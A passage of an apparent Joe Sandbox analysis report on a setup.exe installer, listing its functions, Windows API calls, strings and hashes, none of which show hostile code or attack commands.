                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageParentSendWindow$BrowseFolderFromH_prolog3ListMallocPath
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1481806134-0
                                                                                                                          • Opcode ID: f9449ce11293d5a9641a4745ce76c524f02fce28f7b3da358cfba657abf29e1e
                                                                                                                          • Instruction ID: c9ad904e830f98c8cc56de9b3034704747a88b2f3777f6e63c17982197b35786
                                                                                                                          • Opcode Fuzzy Hash: f9449ce11293d5a9641a4745ce76c524f02fce28f7b3da358cfba657abf29e1e
                                                                                                                          • Instruction Fuzzy Hash: 6F41C471910225AFDB15ABA0DC59ABEB779BF14310F090118F812E75E1DF70DE00EBA0
                                                                                                                          Function 00C11297 Relevance: 15.1, APIs: 10, Instructions: 122windowkeyboardCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C1129E
                                                                                                                          • GetKeyState.USER32(00000011), ref: 00C112A7
                                                                                                                          • GetObjectW.GDI32(?,0000005C,?), ref: 00C112D2
                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00C11314
                                                                                                                          • GetSystemMetrics.USER32(00000006), ref: 00C11395
                                                                                                                          • GetSystemMetrics.USER32(00000003), ref: 00C1139B
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00C113AD
                                                                                                                          • PtInRect.USER32(?,?,?), ref: 00C113D3
                                                                                                                          • PostMessageW.USER32(?,-00000115,00000000,00000000), ref: 00C113F5
                                                                                                                          • PostMessageW.USER32(?,-00000115,00000001,00000000), ref: 00C1140E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageMetricsPostRectSystem$ClientCreateFontH_prolog3_IndirectObjectState
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 488872601-0
                                                                                                                          • Opcode ID: 6a55fe7df81e685f1ca8516099a77476d4dc05730deaab674ea786d960a5cac5
                                                                                                                          • Instruction ID: 88e7fade76388fd9618119125f8455edbb5d9f7ed9e9618a19dd80b4b00063ba
                                                                                                                          • Opcode Fuzzy Hash: 6a55fe7df81e685f1ca8516099a77476d4dc05730deaab674ea786d960a5cac5
                                                                                                                          • Instruction Fuzzy Hash: 4B41E431E002199BCF209FA4CD49BED3779BF0A714F288169FA25E70D1DB789984AF50
                                                                                                                          Function 00C18514 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 231COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C1851E
                                                                                                                          • _strlen.LIBCMT ref: 00C1855E
                                                                                                                          • _strlen.LIBCMT ref: 00C185AC
                                                                                                                          • _strlen.LIBCMT ref: 00C185F9
                                                                                                                          • _strlen.LIBCMT ref: 00C18645
                                                                                                                            • Part of subcall function 00C03869: MultiByteToWideChar.KERNEL32(?,00000000,00000000,000000FF,?,?), ref: 00C0388C
                                                                                                                            • Part of subcall function 00C268FA: __EH_prolog3_GS.LIBCMT ref: 00C26901
                                                                                                                            • Part of subcall function 00C268FA: lstrlenA.KERNEL32(00000000), ref: 00C2698B
                                                                                                                            • Part of subcall function 00C268FA: lstrlenA.KERNEL32(00000007,00000007), ref: 00C2699E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _strlen$H_prolog3_lstrlen$ByteCharMultiWide
                                                                                                                          • String ID: $Failed to open xml file %s$Set "%s" = "%s"
                                                                                                                          • API String ID: 2761301357-3046045696
                                                                                                                          • Opcode ID: 2471efe8cba4a8348e9c30f2bb44ec5567e699f2f1c03d2509257bd9779e988e
                                                                                                                          • Instruction ID: ca33fc14d0ad282030bc23848ff3724a63fa69c3b5ef6eb4b1d8fca75ee0d9cc
                                                                                                                          • Opcode Fuzzy Hash: 2471efe8cba4a8348e9c30f2bb44ec5567e699f2f1c03d2509257bd9779e988e
                                                                                                                          • Instruction Fuzzy Hash: C4818C71A04254DFDB20EBA4CC85ADEB779AF06310F1441A9F415AB1D2DF309F89EBA1
                                                                                                                          Function 00C2BA49 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 203filetimeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000010,00000000), ref: 00C2BC17
                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00C2BC4A
                                                                                                                          • GetFileType.KERNEL32(00000000), ref: 00C2BC71
                                                                                                                          • SetFileTime.KERNEL32(00000000,?,?,?), ref: 00C2BC98
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00C2BC9F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseCreateHandleTimeTypeWrite
                                                                                                                          • String ID: ../$..\$:
                                                                                                                          • API String ID: 3781839213-2303759622
                                                                                                                          • Opcode ID: 8781b41147661d68c6830fbf74e038b3118bb04e0d4ec2c41b2ddb226453fdb9
                                                                                                                          • Instruction ID: 8192222b53dd0f13c385cd2eec62a0fed95fbef059e44a785e2f4fc57a5e0f25
                                                                                                                          • Opcode Fuzzy Hash: 8781b41147661d68c6830fbf74e038b3118bb04e0d4ec2c41b2ddb226453fdb9
                                                                                                                          • Instruction Fuzzy Hash: 55610571A002399BCB24EB24EC85BEEB3B4BF44310F1005A9F625A7591DF70AF85DB50
                                                                                                                          Function 00C2CD2F Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 117libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LoadLibraryW.KERNEL32(Comctl32.dll,00000000,00000000,00000002,Comctl32.dll,00000040), ref: 00C2CEC5
                                                                                                                            • Part of subcall function 00C2CC8B: GetProcAddress.KERNEL32(00000000,00C34B26), ref: 00C2CCB9
                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000105,?,00C34AFB,?,00CBA218,00000010,00C2F239,?), ref: 00C2CDDF
                                                                                                                          • SetLastError.KERNEL32(0000006F,?,00C34AFB,?,00CBA218,00000010,00C2F239,?), ref: 00C2CDF3
                                                                                                                          • GetLastError.KERNEL32(00000020), ref: 00C2CE4A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$AddressFileLibraryLoadModuleNameProc
                                                                                                                          • String ID: $@$Comctl32.dll$GetModuleHandleExW
                                                                                                                          • API String ID: 3640817601-4183358198
                                                                                                                          • Opcode ID: 89f17c77ea8fb11450a9469720abe4562e9b2181c6efcaa67443790559d92358
                                                                                                                          • Instruction ID: 5b6895aa1a7e6405ee08d964088a7519b855c50745095377c7704dda25a3ffc4
                                                                                                                          • Opcode Fuzzy Hash: 89f17c77ea8fb11450a9469720abe4562e9b2181c6efcaa67443790559d92358
                                                                                                                          • Instruction Fuzzy Hash: B3419171940238AADB309B68ECCDBAE76BCEB45710F1102A6F519E25E0DB749F85CF50
                                                                                                                          Function 00C1B21F Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 117registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C1B226
                                                                                                                          • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00C1B2C3
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00C1B2D5
                                                                                                                          • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,0000006F,0000001C), ref: 00C1B381
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Close$CreateH_prolog3
                                                                                                                          • String ID: ForceIEUserAgent$ForceXPEdition$GetUnstableBeta$Software\%s\MultiUpdate
                                                                                                                          • API String ID: 2337491860-2948741853
                                                                                                                          • Opcode ID: 3c9289d293848b34e43f76e23b874ba8d99e3c203512000e090eac5fc7bdb205
                                                                                                                          • Instruction ID: bc1c97faa0ec3f292d868f1103b5dd58888a8c7f507b805e412a47bfed89865f
                                                                                                                          • Opcode Fuzzy Hash: 3c9289d293848b34e43f76e23b874ba8d99e3c203512000e090eac5fc7bdb205
                                                                                                                          • Instruction Fuzzy Hash: D4419E30D0021ADEEF10DBA0CC85EFEBB78FF19740F140429E811B6092EB715A99EB21
                                                                                                                          Function 00C2FABA Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 73libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 00C2FAE0
                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00C2FAF0
                                                                                                                          • EncodePointer.KERNEL32(00000000), ref: 00C2FAF9
                                                                                                                          • DecodePointer.KERNEL32(00000000,?,00000000), ref: 00C2FB07
                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00C2FB2F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Pointer$AddressDecodeDirectoryEncodeHandleModuleProcSystem
                                                                                                                          • String ID: SetDefaultDllDirectories$\$kernel32.dll
                                                                                                                          • API String ID: 2101061299-3881611067
                                                                                                                          • Opcode ID: 1e71139aa31b9de12011c5dacc73a8fe77b6cf90dcef77a985d7e282c34e367b
                                                                                                                          • Instruction ID: c28ab13699e8d8708b722396746bd2ea2eba6c6daa42dfecc77e2028eda59252
                                                                                                                          • Opcode Fuzzy Hash: 1e71139aa31b9de12011c5dacc73a8fe77b6cf90dcef77a985d7e282c34e367b
                                                                                                                          • Instruction Fuzzy Hash: 9D217231A4022CABCB209B75FC5DFAF3ABCAB48750F1405BEF815D3190E770DA459A95
                                                                                                                          Function 00C414B5 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 66COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetStockObject.GDI32(00000011), ref: 00C414D7
                                                                                                                          • GetStockObject.GDI32(0000000D), ref: 00C414E3
                                                                                                                          • GetObjectW.GDI32(00000000,0000005C,?), ref: 00C414F4
                                                                                                                          • GetDC.USER32(00000000), ref: 00C41503
                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C4151A
                                                                                                                          • MulDiv.KERNEL32(?,00000048,00000000), ref: 00C41526
                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00C41532
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                          • String ID: System
                                                                                                                          • API String ID: 46613423-3470857405
                                                                                                                          • Opcode ID: 9c247f51f44e44e30995b097507df379cc6f3cdd198614ddf9aeaebd53863535
                                                                                                                          • Instruction ID: 70fa4109b0e5343bfad25d9b7c3bd2217e61707b0f4c75c86d3e39789be47c16
                                                                                                                          • Opcode Fuzzy Hash: 9c247f51f44e44e30995b097507df379cc6f3cdd198614ddf9aeaebd53863535
                                                                                                                          • Instruction Fuzzy Hash: 75115E71700318ABEB149B65EC8DFBE7BB9BB44741F04001AFA06DB2D0DB709D04DA24
                                                                                                                          Function 00C0FE18 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55librarywindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C0FE1F
                                                                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00C0FE3F
                                                                                                                          • GetWindowsDirectoryW.KERNEL32(00000000,00000104,00000104), ref: 00C0FE6A
                                                                                                                          • LoadLibraryW.KERNEL32(?,\winhlp32.exe,00000000,000000FF), ref: 00C0FE94
                                                                                                                          • LoadCursorW.USER32(00000000,0000006A), ref: 00C0FEA4
                                                                                                                          • CopyIcon.USER32(00000000), ref: 00C0FEAF
                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 00C0FEBE
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Load$CursorLibrary$CopyDirectoryFreeH_prolog3IconWindows
                                                                                                                          • String ID: \winhlp32.exe
                                                                                                                          • API String ID: 1689740230-695620452
                                                                                                                          • Opcode ID: 1a8665ed703652cc7eb709df0197a3548a0dd26e9bcc1fa0e4398eccee65b00f
                                                                                                                          • Instruction ID: 76fd1be262337c66785dbbd9e456c6724f0b5cacc341c74e37f2308eed9a4498
                                                                                                                          • Opcode Fuzzy Hash: 1a8665ed703652cc7eb709df0197a3548a0dd26e9bcc1fa0e4398eccee65b00f
                                                                                                                          • Instruction Fuzzy Hash: 231130B1900623AFDF15BBB0DC1DBAEB628BF11310F454629F425A71E1DF349A02DBA5
                                                                                                                          Function 00C2180E Relevance: 13.8, APIs: 9, Instructions: 316COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C21818
                                                                                                                            • Part of subcall function 00C35225: __EH_prolog3.LIBCMT ref: 00C3522C
                                                                                                                            • Part of subcall function 00C35225: GetWindowTextLengthW.USER32(?), ref: 00C3523C
                                                                                                                            • Part of subcall function 00C35281: __EH_prolog3.LIBCMT ref: 00C35288
                                                                                                                            • Part of subcall function 00C35281: GetWindowTextW.USER32(?,?,?), ref: 00C3529F
                                                                                                                          • CharNextW.USER32(?), ref: 00C218B5
                                                                                                                          • CharNextW.USER32(00000000), ref: 00C218F0
                                                                                                                          • CharPrevW.USER32(00000000,00000000), ref: 00C2190D
                                                                                                                          • CharPrevW.USER32(00000000,00000000), ref: 00C21922
                                                                                                                          • CharNextW.USER32(?), ref: 00C21B2F
                                                                                                                          • CharNextW.USER32(00000000), ref: 00C21B5A
                                                                                                                          • CharPrevW.USER32(00000000,00000000), ref: 00C21B77
                                                                                                                          • CharPrevW.USER32(00000000,00000000), ref: 00C21B8C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Char$NextPrev$H_prolog3TextWindow$H_prolog3_Length
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2364446717-0
                                                                                                                          • Opcode ID: 9431717ebfa653be6519b4b63a0b589c732a6c0fb10d228ac29c9d0985290c6a
                                                                                                                          • Instruction ID: 7dfe6b98892b739c0bb7d32a5a08f6b15d13ea65ca49fb51c4158ad0f9f76055
                                                                                                                          • Opcode Fuzzy Hash: 9431717ebfa653be6519b4b63a0b589c732a6c0fb10d228ac29c9d0985290c6a
                                                                                                                          • Instruction Fuzzy Hash: 05B116B19002689FCB24EB64DC99BEE77B9AF68310F14419AF805E31C1EE355F85DB60
                                                                                                                          Function 00C46960 Relevance: 13.8, APIs: 9, Instructions: 264windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C46967
                                                                                                                          • SendMessageW.USER32(?,00000469,00000000,?), ref: 00C46A69
                                                                                                                          • SendMessageW.USER32(?,0000046A,?,00000000), ref: 00C46A7D
                                                                                                                          • SendMessageW.USER32(?,00000468,?,00000000), ref: 00C46A8E
                                                                                                                          • SendMessageW.USER32(?,00000470,00000000,00000000), ref: 00C46ACE
                                                                                                                          • SendMessageW.USER32(?,0000046F,00000000,00000000), ref: 00C46B17
                                                                                                                          • SendMessageW.USER32(?,00000473,00000000,00000001), ref: 00C46B3D
                                                                                                                          • SendMessageW.USER32(?,0000046F,00000000), ref: 00C46BC0
                                                                                                                          • SendMessageW.USER32(?,00000473,00000000), ref: 00C46C06
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$H_prolog3
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1885053084-0
                                                                                                                          • Opcode ID: 3a0221038a6c6e7fde50c33992d5a6f3a32afe6d0805770df41c9494427a1375
                                                                                                                          • Instruction ID: 72d9751db781a52100c56f06744477831fa45093ea128a0a1069b4241853d2e6
                                                                                                                          • Opcode Fuzzy Hash: 3a0221038a6c6e7fde50c33992d5a6f3a32afe6d0805770df41c9494427a1375
                                                                                                                          • Instruction Fuzzy Hash: 00A17A70A00226DFCB05DF64C898B6EBBB5FF49310F154059E952A7395DB70AD10EBA2
                                                                                                                          Function 00C302E6 Relevance: 13.6, APIs: 9, Instructions: 118windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C302F0
                                                                                                                          • SendMessageW.USER32(?,00000000,00000000,00000080), ref: 00C30337
                                                                                                                          • SendMessageW.USER32(?,00000000,00000000,?), ref: 00C30363
                                                                                                                          • ValidateRect.USER32(?,00000000), ref: 00C30376
                                                                                                                            • Part of subcall function 00C3F53C: GetClientRect.USER32(?,?), ref: 00C3F5A0
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00C303E7
                                                                                                                          • BeginPaint.USER32(?,?), ref: 00C303F4
                                                                                                                          • SendMessageW.USER32(?,00000000,00000000,?), ref: 00C3042A
                                                                                                                          • SendMessageW.USER32(?,00000000,00000000), ref: 00C3044C
                                                                                                                          • EndPaint.USER32(?,?), ref: 00C30464
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Rect$ClientPaint$BeginH_prolog3_Validate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3883544035-0
                                                                                                                          • Opcode ID: e33fe65892611300a1feb41a5dc142fa2c85c31b7ba3074b52d73fa2542f14b8
                                                                                                                          • Instruction ID: 1b704996e397f33c0f63fc3d48e1b0fa1308ee2d7f9a56cd62c25a53b973c6a1
                                                                                                                          • Opcode Fuzzy Hash: e33fe65892611300a1feb41a5dc142fa2c85c31b7ba3074b52d73fa2542f14b8
                                                                                                                          • Instruction Fuzzy Hash: 81418F72910645EFCF21AFA0DC94FAEB6B9FF48301F10852EF16692560DB319A41DF10
                                                                                                                          Function 00C8CA02 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 292COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
